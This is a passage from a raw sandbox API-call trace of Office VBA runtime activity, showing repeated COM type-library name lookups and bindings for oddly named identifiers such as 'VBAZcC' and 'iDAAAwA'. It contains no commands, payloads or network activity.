(in: This=0x665ba50, szNameBuf="VBAZcC", lHashVal=0x104aac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.661] IUnknown:Release (This=0x665ba50) returned 0xd [0069.661] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.661] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="VBAZcC", lHashVal=0x104aac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.661] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.661] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.661] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="VBAZcC", lHashVal=0x104aac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.661] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.661] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.661] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="VBAZcC", lHashVal=0x104aac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.661] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VBAZcC") returned 7 [0069.661] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="VBAZcC", lHashVal=0x104aac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.661] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.661] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b816ba | out: _Dst=0x67c2d40) returned 0x0 [0069.661] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_VBAZcC") returned 0x10c555 [0069.661] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_VBAZcC" | out: _Dst="_B_var_VBAZcC") returned 0x0 [0069.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_VBAZcC") returned 14 [0069.661] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.661] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_VBAZcC", lHashVal=0x10c555, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.661] IUnknown:Release (This=0x665ba50) returned 0xd [0069.661] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.661] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_VBAZcC", lHashVal=0x10c555, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.661] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.661] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.661] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_VBAZcC", lHashVal=0x10c555, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.661] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.661] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.662] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_VBAZcC", lHashVal=0x10c555, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.662] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.662] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.662] IUnknown:Release (This=0x665ba50) returned 0xd [0069.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87091e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_VBAZcC") returned 14 [0069.662] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_VBAZcC", lHashVal=0x10c555, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x63005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x63005a00000000, pDummy=0x0) returned 0x0 [0069.662] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b816ba | out: _Dst=0x144ec0) returned 0x0 [0069.662] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.662] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.662] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.662] IUnknown:Release (This=0x665ba50) returned 0xd [0069.662] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.662] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.662] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.662] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.662] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.662] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.662] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.662] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.662] IUnknown:Release (This=0x665ba50) returned 0xd [0069.662] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.662] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.663] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.663] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.663] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.663] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.663] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.663] IUnknown:Release (This=0x665ba50) returned 0xd [0069.663] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.663] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.663] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.663] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.663] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.663] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.663] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.663] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.663] IUnknown:Release (This=0x665ba50) returned 0xd [0069.663] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.663] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.663] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.663] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.663] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.663] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.663] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.663] IUnknown:Release (This=0x665ba50) returned 0xd [0069.663] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.664] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.664] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.664] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.664] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.664] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.664] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.664] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.664] IUnknown:Release (This=0x665ba50) returned 0xd [0069.664] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.664] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.664] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.664] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.664] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.664] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.664] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.664] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.664] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.664] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.664] IUnknown:Release (This=0x665ba50) returned 0xd [0069.664] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.664] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.665] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.665] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.665] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.665] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.665] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.665] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.665] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.665] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.665] IUnknown:Release (This=0x665ba50) returned 0xd [0069.665] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.665] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.665] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81612, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAAwA") returned 8 [0069.665] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iDAAAwA", lHashVal=0x10c902, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81612, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAAwA") returned 8 [0069.665] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iDAAAwA", lHashVal=0x10c902, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81612, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAAwA") returned 8 [0069.665] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iDAAAwA", lHashVal=0x10c902, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.666] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iDAAAwA") returned 0x10c902 [0069.666] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iDAAAwA" | out: _Dst="iDAAAwA") returned 0x0 [0069.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iDAAAwA") returned 8 [0069.666] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.666] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iDAAAwA", lHashVal=0x10c902, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.666] IUnknown:Release (This=0x665ba50) returned 0xd [0069.666] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.666] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iDAAAwA", lHashVal=0x10c902, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.666] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.666] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.666] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iDAAAwA", lHashVal=0x10c902, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.666] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.666] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.666] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iDAAAwA", lHashVal=0x10c902, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.666] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81612, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAAwA") returned 8 [0069.666] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iDAAAwA", lHashVal=0x10c902, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.666] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.666] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81612 | out: _Dst=0x67c2d40) returned 0x0 [0069.666] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iDAAAwA") returned 0x10cc86 [0069.666] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iDAAAwA" | out: _Dst="_B_var_iDAAAwA") returned 0x0 [0069.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iDAAAwA") returned 15 [0069.666] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.666] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iDAAAwA", lHashVal=0x10cc86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.666] IUnknown:Release (This=0x665ba50) returned 0xd [0069.666] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.666] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iDAAAwA", lHashVal=0x10cc86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.666] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.667] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.667] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iDAAAwA", lHashVal=0x10cc86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.667] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.667] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.667] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iDAAAwA", lHashVal=0x10cc86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.667] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.667] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.667] IUnknown:Release (This=0x665ba50) returned 0xd [0069.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87094e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iDAAAwA") returned 15 [0069.667] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iDAAAwA", lHashVal=0x10cc86, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.667] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81612 | out: _Dst=0x144ec0) returned 0x0 [0069.667] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IDA4AC1_", lHashVal=0x10d1d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8170e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDA4AC1_") returned 9 [0069.667] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IDA4AC1_", lHashVal=0x10d1d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, 